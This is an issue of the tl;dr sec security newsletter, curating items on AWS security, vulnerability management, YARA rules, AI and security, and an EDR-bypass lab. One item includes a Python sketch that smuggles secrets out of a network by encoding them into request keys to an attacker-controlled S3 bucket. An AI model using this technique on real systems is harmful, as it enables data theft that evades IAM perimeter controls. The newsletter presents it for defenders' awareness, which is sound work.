[tl;dr sec] #212 - AWS Security Services Best Practices, EDR Bypass Lab, 100+ Vulnerable Practice Apps
Guide by AWS on configuring AWS security services, free lab to learn to bypass common EDR detection mechanisms, massive list of vulnerable apps to practice on
I hope you’ve been doing well!
👋 New Year, Who Dis?
I hope you had a great holiday break and New Year's!
If you're new, welcome 🙌 I'm excited you're here.
Recap: tl;dr sec is a weekly newsletter, sent out Thursday mornings PT, curating and distilling the best tools, blog posts, and research about AppSec, web, cloud, container, and supply chain security, red and blue team, AI, and more.
Usually the intro is a bit silly and something about my life, and the rest is technical security content.
Sponsor blurbs are in green, and checking them out is great karma, as they make it possible for me to keep this newsletter running 🙏
Over the break I visited my family in the Midwest.
One of my favorite things I did was visit my sister at work; she recently joined a wellness clinic where employees’ family members can use the services for free.
So like an archetypal Bay Area tech person, I strolled in there wearing my Allbirds and an unjustified sense of saving the world, and embraced All The Longevity things™️.
I did red light therapy (stand between bright red lights), sat in a 166°F infrared sauna, spent the longest 2.5 minutes of my life in a -160°F cryo chamber, and turned into a Transformer by wearing arm and leg compression boots at the same time.
I think this means I can live forever now?
📣 SEC Materiality framework
What defines a “material” cybersecurity incident?
This framework, built alongside 30+ cybersecurity executives, helps provide a baseline for determining what incidents could possibly be reported to the SEC.
*This does not constitute legal advice. Ultimately, “materiality” should be determined by your own legal counsel.
Timely and relevant for security leaders 👆️
Maturing Your Threat Modeling Skills
We Hack Purple founder and friend of the newsletter Tanya Janca will be doing a webinar with threat modeling legend Adam Shostack on January 25 at 9:00 am PT. They’ll discuss how to both structure and free flow to ensure comprehensive threat models, how to seamlessly integrate threat modeling into your SDLC, and Q&A.
Scaling vulnerability management across thousands of services and more than 150 million findings
Stephan Miehe gives a great walkthrough of how GitHub does vulnerability management at scale, including key requirements and best practices as well as their implementation. Automate all repeatable tasks, work within existing dev systems (GitHub PR workflow and Issues), have clear accountability and responsibility to help drive next steps and action, use analytics to know where you should focus to systematically drive down risk, etc.
Stephan also describes Security Findings, their internal tool that deduplicates findings from different sources (GitHub Advanced Security, bug bounty, grype), has custom views based on context (e.g. shows vulnerable images and their deployment locations for containerized apps, shows IP addresses and hostnames for a VM in a datacenter), handles exceptions, and integrates with Slack.
📣 ESET Threat Report H2 2023
A view of the H2 2023 threat landscape as seen by ESET telemetry and from the perspective of ESET threat detection and research experts.
The Cl0p cybercriminal group gained attention with the "MOVEit hack," diverting from their usual tactics by leaking information if the ransom wasn't paid. The Mozi IoT botnet faced disruption through a discovered kill switch, prompting speculation on its origin. AI-enabled attacks targeted users of tools like ChatGPT, while Android spyware cases surged with SpinOk.
These trends underscore the dynamic and diverse nature of contemporary cybersecurity challenges.
We wish you an insightful read.
A nice round-up of recent campaigns ☝️ I’m especially curious about the AI-enabled attacks targeting users of tools like ChatGPT.
AWS Security Services Best Practices
A guide by AWS on best practices for configuring AWS security services. The initial release covers Amazon Detective, GuardDuty, Inspector, Macie, and AWS Security Hub.
Cloud services as exfiltration mechanisms
Airwalk Reply’s Costas Kourmpoglou outlines a clever way an attacker can exfiltrate sensitive info from a victim network with no permissions, bypassing data perimeter IAM conditions on the victim’s identity. How? The attacker makes a request to an attacker-controlled S3 bucket, including the info to exfiltrate in the request, and then even if that request is denied, the leaked info is logged and delivered to the attacker's logging bucket because of S3 server access logging.
This technique has also been added to the excellent Hacking The Cloud wiki.
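As a sketch, the leaked data rides in the object key of a request to the attacker's bucket; the bucket name and helper below are hypothetical, and the request can be unauthenticated and denied — S3 server access logging records the requested key either way:

```python
from urllib.parse import quote

# Illustrative sketch of the exfiltration primitive (names hypothetical).
# The data to leak is encoded into the object key of a request to an
# attacker-controlled bucket with server access logging enabled. Even if
# S3 returns AccessDenied, the full requested key is written to the
# attacker's logging bucket.
def exfil_url(bucket: str, secret: str) -> str:
    # URL-encode the secret so it survives as a single key segment
    return f"https://{bucket}.s3.amazonaws.com/exfil/{quote(secret, safe='')}"

# Any principal on the victim side then issues a plain GET to this URL;
# a 403 response is fine -- the key has already hit the access log.
```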
A tool that helps Kubernetes admins remove a list of non-running images from all Kubernetes nodes in a cluster.
New year, new image: Introducing the Chainguard Images Directory
Chainguard’s Adam Dawson announces:
A new Images Directory, providing a searchable inventory of ~500 minimal, hardened images with low-to-zero known CVEs
A self-service Security Advisories page to help you find the latest information on CVEs in packages you’re using
Digestabot, a GitHub Action to automatically initiate pull requests for image updates, ensuring you’re using the most secure, up-to-date versions.
By Trail of Bits: Finds unmaintained packages in Rust projects automatically using heuristics, rather than relying on users to manually submit them to the RustSec Advisory Database.
A Comparative Study of Vulnerability Reporting by Software Composition Analysis Tools
Enforcing Device Trust on Code Changes
Griffin Choe describes some 👌 security engineering that Figma built to ensure that code changes merged into GitHub release branches come from trusted, company-managed devices.
How: X.509 Okta Device Trust Certificates issued to company MacBooks are used to sign commits via a modified version of GitHub's smimesign utility. On git pushes, a custom GitHub App triggers a Lambda function that verifies the commit signature, then posts a commit status (“commit-integrity-verification”) back to GitHub. Figma also has an allowlist of GitHub bot authors they trust.
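The shape of the Lambda's response can be sketched as a commit-status payload posted back to GitHub's REST API (`POST /repos/{owner}/{repo}/statuses/{sha}`); this is an illustrative sketch, not Figma's actual code, and only the `commit-integrity-verification` context name comes from the post:

```python
# Sketch of the status payload a verification Lambda might post to
# GitHub after checking a commit signature against the device-trust CA.
# Field names follow GitHub's commit-status REST API; the descriptions
# and helper are hypothetical.
STATUS_CONTEXT = "commit-integrity-verification"

def build_status(sha: str, signature_valid: bool) -> dict:
    state = "success" if signature_valid else "failure"
    return {
        "sha": sha,  # target of POST /repos/{owner}/{repo}/statuses/{sha}
        "payload": {
            "state": state,
            "context": STATUS_CONTEXT,
            "description": (
                "Commit signed by a trusted, company-managed device"
                if signature_valid
                else "Commit signature missing or untrusted"
            ),
        },
    }
```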
Introducing YARA-Forge. Streamlined Public YARA Rule Collection
Nextron Systems' Florian Roth introduces YARA Forge, a tool designed to streamline the collection and organization of YARA rules, analyzing rules for inconsistent metadata, quality (FP rates), and performance. It outputs core, extended, and full rulesets based on the coverage vs performance trade-offs you want to make, and currently includes rules from 20 public YARA repos.
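To illustrate the kind of per-rule metadata YARA Forge normalizes and checks across repos, here's a minimal, hypothetical YARA rule (not one from the collection):

```
rule Example_Suspicious_Marker
{
    meta:
        description = "Detects a hypothetical suspicious marker string"
        author = "example"
        date = "2024-01-01"
        score = 60
    strings:
        $a = "EVIL_MARKER" ascii
    condition:
        $a
}
```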
Unveiling VISS: a revolutionary approach to vulnerability impact scoring
Zoom’s Roy Davis announces the Vulnerability Impact Scoring System (VISS), which aims to prioritize actual demonstrated impact over theoretical security impact. CVSS focuses on the attacker's viewpoint and worst-case scenarios, while VISS takes the defender’s perspective, basing its evaluations on responsibly demonstrated exploitation. VISS calculator and spec here.
Ghidriff: Ghidra Binary Diffing Engine
@clearbluejar presents ghidriff, a new open-source Python package that supports command-line binary diffing by leveraging Ghidra, and can output the result to Markdown. The post gives a great overview of the history of binary diffing, what makes it hard, and ghidriff features.
Introducing the Best EDR Of The Market Project
Yazid Benjamaa shares Best EDR of the Market, an open source EDR designed to serve as a testing ground for understanding and bypassing some of the detection mechanisms employed by many well-known EDRs, such as import address table (IAT) hooking, call stack monitoring, and DLL hooking.
Machine Learning + Security
Introducing CloudSecGPT: Your Go-To AI for Cloud Security Insights
Marco Lancini has created a cloud security-focused GPT by uploading all of the content of his excellent CloudSecDocs.com.
Dark Visitors: A list of known AI agents on the internet
Insight into the hidden ecosystem of autonomous chatbots and data scrapers crawling across the web. Lists the UserAgents of a number of AI agents (ChatGPT, Anthropic, Cohere, etc.) and how to block them with your robots.txt.
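For example, a robots.txt opting out of a few commonly listed crawlers might look like this (check the site for the current UserAgent strings; the set below is illustrative):

```
# Opt out of known AI crawlers
User-agent: GPTBot
Disallow: /

User-agent: anthropic-ai
Disallow: /

User-agent: CCBot
Disallow: /
```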
Gen AI can supercharge your AppSec program
Sandesh Anand gives a nice overview of some AppSec Gen AI applications: threat modeling (LLMs can parse and extract relevant info from design docs, architecture diagrams, etc.), delivering security standards better (only show devs the coding guidelines they need to know right now), vendor risk management (automate painful security questionnaire), and more. Also, congrats Sandesh for founding Seezo! 🙌
I covered a number of these and other Gen AI applications in this talk (slides), including pen testing, web security, malicious dependencies, and more.
Artificial intelligence can find your location, alarming privacy experts
Three Stanford graduate students built a tool, building on OpenAI’s CLIP and their own dataset of around 500,000 street view images, that given an image, can guess the correct country 95% of the time and can usually pick a location within about 25 miles of the actual site. (paper)
“Where was this photo taken” is not a new problem; Google and others have built similar systems. The point here is that three grad students, with limited time and computational resources, could build something quite effective.
For non-security related AI resources, including OpenAI’s official prompting guide, a video summary of 4 NeurIPS 2023 best paper award papers, and a ton of resources on running agent workflows in the cloud, see my AI Resources page.
Apple is almost as big as France: Apple’s market value is $3.1T, as is the combined market value of the companies on France’s exchange.
uBlock Origin supports procedural filters, which let you hide DOM elements based on their properties. Here’s a rule Hillel Wayne uses to hide all “suggested” posts from LinkedIn: it finds sponsored posts and then walks upward a few DOM elements to filter out the entire card.
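An illustrative filter of that shape, using uBlock Origin's `:has-text()` and `:upward()` procedural operators (the selector and match text are hypothetical, not Hillel's actual rule):

```
www.linkedin.com##span:has-text(Promoted):upward(3)
```

`:has-text()` matches elements containing the given text, and `:upward(n)` climbs n ancestors so the whole post card is hidden, not just the label.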
4-year campaign backdoored iPhones using possibly the most advanced exploit ever
Over four years, the campaign backdoored dozens, if not thousands, of iPhones, many of which belonged to employees of Moscow-based security firm Kaspersky. The attack chain leverages four 0-days and exploits a vulnerability in an undocumented hardware feature that few people, if any, outside of Apple and chip suppliers such as ARM knew about. This is Olympic-level hacking, very impressive.
✉️ Wrapping Up
Have questions, comments, or feedback? Just reply directly, I’d love to hear from you.
If you find this newsletter useful and know other people who would too, I'd really appreciate if you'd forward it to them 🙏
Thanks for reading!